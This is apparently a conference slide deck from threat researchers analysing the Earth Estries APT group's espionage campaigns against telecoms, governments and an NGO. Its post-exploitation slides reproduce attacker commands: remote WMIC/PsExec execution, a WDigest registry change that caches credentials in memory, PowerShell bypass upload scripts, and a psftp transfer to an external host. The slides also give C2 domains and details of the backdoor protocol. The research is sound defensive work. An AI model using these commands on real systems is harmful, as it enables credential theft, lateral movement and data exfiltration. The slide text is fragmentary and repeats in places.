#### Game of Emperor: Unveiling Long Term Earth Estries Cyber Intrusions ###### Leon Chang, Theo Chen 2025/01/21@JSAC2025 ----- ### Whoami ###### Leon Chang Sr. Threat Researcher APT Campaign Tracking / Threat Intelligence / Malware Analysis ###### Theo Chen Sr. Threat Researcher Penetration Testing / Malware Analysis / Threat Hunting ----- # Agenda ----- ##### • The Earth Estries threat group overview • Campaign Overview ###### − Campaign Alpha ### Agenda − Campaign Beta ###### − Others ##### • Attribution • Conclusion ----- ## The Earth Estries threat group overview ----- ### Victimology ----- ### Earth Estries - Profile ----- ### Alias ###### UNC2286[7] and Salt Typhoon represents a threat group/cluster whose activity overlaps with campaigns tracked by other security organizations under names like GhostEmperor[4] and FamousSparrow[5]. Similarly, Earth Estries, Trend Micro’s designation for this group, also overlaps with the activity attributed to GhostEmperor and FamousSparrow. ###### Reference:https://learn.microsoft.com/en-us/defender-xdr/microsoft-threat-actor-naming ----- ### Earth Estries – Toolset Overview ----- ### Motivation ###### Earth Estries ###### Targeting multiple government entities ##### Attack ###### Continuous attack telecommunications companies Organizations that have business dealings with governments and telecommunications providers (e.g. Technology, NGO, etc.) ----- ### Why US NGO? ###### Communications with Congress, federal agencies, the White House, Council members, and the higher education community Provide training service for military units Provide data and analysis to institutional leaders, policy makers, and practitioners ----- ## Campaign Overview ----- ### Campaign Timeline ###### Campaign Alpha(Part1): Campaign targeting Government, Chemistry, Transportation in APAC region Tools: DEMODEX, SNAPPYBEE, Cobalt Strike, etc. ###### Campaign Alpha(Part2): Found US NGO leaked data on C2 ###### Old Campaign Industry: Government, Telecom, Property, Technology, Aviation, etc. Country: TH, VN, PH, ID, IN, AF and TW. Tools: DEMODEX, GHOSTSPIDER, SparrowDoor, etc. ###### Campaign Beta: A long-term campaign targeting telecom company in Taiwan, Thailand, Indonesia, Vietnam, the Philippines, Afghanistan and United States. Tool: DEMODEX, GHOSTSPIDER and SoftEther VPN ###### SparrowDoor, etc. ----- ### Campaign Alpha Overview ----- ### Campaign Beta Overview ----- ## Campaign Alpha ----- ### The beginning ###### • We observed some interesting malicious samples on a C2: 23.81.41[.]166:80 in Oct. 2023. • The Possible C2 Active timeline: 2023/10/12 ~ 2024/04/02. |Notable File|Description| |---|---| |sql.toml|frp config (C2 Server:165.154.227[.]192)| |onedrived.zip|Contains a PowerShell script ondrived.ps1.| |Nsc.exe|The First SNAPPYBEE sample set. SNAPPYBEE C2 domain: api.solveblemten[.]com| |123.zip/WINMM.dll|| |NortonLog.txt|| |0202/*|Another SNAPPYBEE sample set(imfsbSvc.exe, imfsbDll.dll, DgApi.dll and dbindex.dat). SNAPPYBEE C2 domain: C2:esh.hoovernamosong[.]com| |Others|Open source hacktools like frpc, NeoReGeorg tunnel and fscan.| ----- ### Additional frp c2 Findings ###### The C2: 165.154.227.192 is also mentioned in some Ivanti exploits report: 1. https://fortiguard.fortinet.com/jp/outbreak-alert/ivanti-authentication-bypass 2. https://gist.github.com/andrew-morris/7679a18ef815068897bf27bf631f2ede ###### Ivanti exploits report: ###### 2. https://gist.github.com/andrew-morris/7679a18ef815068897bf27bf631f2ede ----- ### The Link to GhostEmperor ----- ### DEMODEX Infection Chain ###### • Analysis requirement: 1. First stage powershell script: requires a decryption key as an argument 2. Second stage service loader: uses computer name as the AES key ###### Control Flow Flattening ----- ### DEMODEX Analysis Screenshots ###### Anti-analysis techniques Decrypted c2 configuration Control Flow Flattening ###### Anti-analysis techniques Decrypted c2 configuration Control Flow Flattening ----- ### Campaign Alpha Post-exploitation Findings ###### frp config frp c2 server |Tools / Type|Description| |---|---| |frp related|l WMIC.exe /node: /user: /password: process call create "cmd.exe /c expand c:/windows/debug/1.zip c:/windows/debug/notepadup.exe l WMIC.exe /node: /user: /password: process call create "cmd.exe /c c:/windows/debug/notepadup.exe -c c:/windows/debug/sql.toml"" l cmd.exe /c ping 165.154.227.192 -n 1 > c:\Windows\debug\info.log l cmd.exe /c expand c:/windows/debug/1.zip c:/windows/debug/win32up.exe l cmd.exe /c c:/windows/debug/win32up.exe -c c:/windows/debug/sql.toml| |collect host information|l cmd.exe /c tasklist /v > c:\windows\debug\info.log l cmd.exe /c wevtutil qe security /format:text /q:\"Event[System[(EventID=4624)]\" > c:\windows\debug\info.log Find logon user information (username, logon IP address)| |ps.exe (PSEXEC.exe)|l C:\Windows\assembly\ps.exe /accepteula \\ -u -p -s cmd /c c:\Windows\assembly\1.bat l WMIC.exe /node: /user: /password: process call create "cmd.exe /c c:\Windows\debug\1.bat""| ----- ### Exfiltration – US NGO entity ###### (TLP:RED) Projection only ----- ### SNAPPYBEE Analysis Screenshot ###### Main module id: 0x20 ----- ### Campaign Alpha C2 Infrastructure Analysis ###### Question: Are these infrastructures with the same registration information all used by the same group? ----- ## Campaign Beta ----- ### New DEMODEX Installation Flow ----- ### New DEMODEX Infection Flow ###### Difference: The new infection chain no longer use a first-stage PowerShell script to deploy the additional needed payload. The required payload for installation are bundled in a CAB file. ----- ### Operation Mistakes? ###### • The DEMODEX C&C domain pulseathermakf[.]com has been used to target Southeast Asian government for several years • We detected a network connection to pulseathermakf[.]com from a compromised server belonging ###### to a Southeast Asian telecommunications company ###### Made a mistake in packing the sample? ###### to a Southeast Asian telecommunications company Made a mistake in packing the sample? Connect Connect ----- ### Campaign Beta: Notable Malicious Activities ###### "C:\WINDOWS\system32\taskkill.exe" /fi "modules eq WpcCfg.dll" /f ###### DEMODEX loader ###### wevtutil qe security /rd:true /f:text /q:"*[System/EventID=4624 and 4672] and *[EventData/Data[@Name='TargetUserName']='']" /c:50 ###### powershell -ex bypass .\u.ps1 powershell -ex bypass .\fireup.ps1 < complex_random_password > powershell -ex bypass .\upload.ps1 < complex_random_password > ###### Find administrator equivalent logon user information (username, logon IP address) ###### powershell.exe Test-NetConnection -RemoteAddress -Port reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f ###### schtasks /create /tn gs /tr c:\windows\web\pings.bat /sc once /st 20:32:00 /ru system C:\Windows\SYSTEM32\cmd.exe /c "c:\windows\web\debug.bat" C:\Windows\Web\psftp.exe 203.20.113[.]208 -P 443 -l -pw -b 1.txt ###### When UseLogonCredential value is set to 1, WDigest will store credentials in memory ----- #### Sophisticated Multi-modular Backdoor: GHOSTSPIDER ###### • We found a previously unknown backdoor GHOSTSPIDER in APAC telecom company. − GHOSTSPIDER Stager: c:\windows\web\web.dll (DLL original name: spider.dll) • We observed the GHOSTSPIDER activities since 2021. − We identified some old samples compiled at 2021/11/18. − The GHOSTSPIDER C2 domain: jasmine.lhousewares[.]com is active since 2021/12. − We confirmed the attacker utilized GHOSTSPIDER around 2022/12. • We suspect GHOSTSPIDER and DEMODEX toolset are possible developed by same group − Both backdoor component developed in two language(C++ and .NET), multi-modular and loaded in- memory design. − Targeting specific host (DEMODEX requires hostname for payload decryption, the GHOSTSPIDER will check hardcoded hostname) ----- ### GHOSTSPIDER’s Technique Analysis - Overview ###### • Another similar TTPs overlap between DEMODEX and GHOSTSPIDER − Possible studying from Cobalt Strike framework? • DEMODEX have Malleable C2 profile • GHOSTSPIDER have similar design like Stager(Optional) and beacon(Client). • Challenge: The final payload/module is retrieved from the C2 server only for selected victims ----- ### GHOSTSPIDER’s Technique Analysis - Stager ###### • We observed the threat actor installs the first-stage stager via regsvr32.exe. • The stager is designed to check for a specific hostname hard-coded in the DLL. • Once the stager is executed, it connects to the stager's C&C server to register a new connection and subsequently receives a module(DLL export name: login.dll). − Stager C2: hxxps[:]//billing[.]clothworls[.]com/index.php & https[:]//telcom[.]grishamarkovgf8936[.]workers[.]dev/index.php regsvr32.exe /s c:\windows\web\web.dll ----- ### GHOSTSPIDER’s Technique Analysis – Beacon (1/2) ###### • We observed the threat actor deploys a legitimate executable file alongside a malicious DLL file Beacon loader deployment ----- ### GHOSTSPIDER’s Technique Analysis – Beacon (2/2) ###### • This malicious DLL, another GHOSTSPIDER module known as the beacon loader − This component is used to launch the beacon payload in memory • The beacon loader contains an encrypted .NET DLL payload (DLL export name: client.dll), which is decrypted and executed in memory. − beacon C2 : hxxps[:]//jasmine[.]lhousewares[.]com/ & hxxps[:]//private[.]royalnas[.]com/index.php Beacon loader deployment ----- #### GHOSTSPIDER Stager Communication Protocol - Request ###### • The requests that are used by the GHOSTSPIDER stager follow a common format − The connection ID is placed in the HTTP header's cookie as “phpsessid” − The connection ID is calculated using CRC32 or CRC64 with UUID4 values ----- #### GHOSTSPIDER Stager Communication Protocol - Response ###### • The decrypted response data is separated by “|” with the following items: − An unknown prefix − did: the connection ID calculated from the infected machine − wid: the remote ID for a specific connection − act: an action code − tt: tick count − An unknown suffix ``` =|did=96A52F5C1F2C2C67|wid=13CF3E8E0E5580EB|act=2|tt=41003562|